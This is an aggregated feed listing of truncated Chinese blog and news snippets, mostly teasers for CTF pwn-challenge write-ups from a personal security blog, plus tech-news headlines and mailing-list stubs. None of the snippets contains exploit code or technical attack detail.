第一次打final 被打的头都炸了,555555. 过去三周了,还是水一下这道签到题. 题目情况作者搞到了一个ruby的
Source: Hurricane618(风之栖息地)
受到摸鱼和各种项目压力之后,终于发出来了,这次是强网杯中强网先锋的4道pwn题,剩下的pwn题还在陆续复现ing,在做了在做了ing <a href="#babymessage" class="headerlink" tit
Source: Hurricane618(风之栖息地)
b00ks这是一道asis ctf 2016的题目,主要功能是书本记录,除了基本的书本的增删改查功能,还有一个作者名称的改变
Source: Hurricane618(风之栖息地)
博客长草严重,上半年摸鱼太久. 最近趁着有空开始复现之前的一些题目,这次做了2020RCTF的几道pwn题,本来还想着把MIPS那道题做出来再发,结果发现MIPS的调试还有很多问题,所以就先发常规一点的题. <a href="#note"
Source: Hurricane618(风之栖息地)
一开始只是抱着开阔视野的心态来的,想着算法是IT行业哪里都会用到的东西,学完之后觉得卜老师不愧是教了13年的老师,很多地方都很受益,虽然不是专门做算法的,其中的很多思想都对以后的工作有一定启发. <a href="#观察问题的角度"
Source: Hurricane618(风之栖息地)
记录一下,我在docker容器中配置Mysql时遇到的坑,以及处理过程中学到的知识. 起因最近作业量多,任务重结果还是被点名出题(
Source: Hurricane618(风之栖息地)
CNSS招新题目中有两道不错的Pwn题,拿来学习一波知识. 然而其中有一道是内核ROP,复现了好几天. 还是有点问题,再加上研究生大作业集群来了(完全不能摸鱼,哭唧唧),所以那道内核题能做出来就放博客
Source: Hurricane618(风之栖息地)
继续进行着栈溢出的练习,这次是参考了ctf-wiki上面的演示题目,在复现过程中的一些记录. over安恒月赛的题目,
Source: Hurricane618(风之栖息地)
RL与HFRL
Source: 网安寻路人
《哪吒之魔童闹海》票房突破 20 亿;Anthropic 将为 Claude AI 引入双向语音模式;郭明錤:Apple Intelligence 对 iPhone 销售无太大帮助;
Source: 极客公园
艺术只提供提问,不提供答案,后者需要一点点试出来
Source: 极客公园
破五迎财神,扫除晦气,迎接好运. 愿你新的一年,顺风顺水,心想事成. 祝财神到,好运来
Source: 锦行信息安全
第一题送分题有手就行,第二、三题 初级题 很简单,如果你对逆向分析感兴趣,不妨借此机会自学尝试,让这次活动真正成为你技能提升的阶梯
Source: 吾爱破解论坛
原域名已变更且将在2024年彻底废弃,请访问 https://govuln. com/news/ 查看新的RSS订阅
Source: 代码审计星球
编者按和大家一样,春节假期期间,公号君也高度关注DeepSeek的技术表现. 作为一名研究法律政策的人员,当然也关注其可能带来的潜在影响. 今天是本系列的第二篇
Source: 不安全
Full Disclosuremailing list archivesFrom: Apple Product Security via Fulldisclos
Source: 不安全
It's IoT time. We're embarking on a very major home project (more det
Source: 不安全
艺术只提供提问,不提供答案,后者需要一点点试出来. 作者 | 汤一涛编辑 | 靖宇1942 年,伟大的科幻作家艾萨克·阿西莫夫(Isaac Asimov)在他的短篇小说《转圈圈》(Runaround)中
Source: 不安全
Full Disclosuremailing list archivesFrom: David Fifield <david () bamsoftware co
Source: 不安全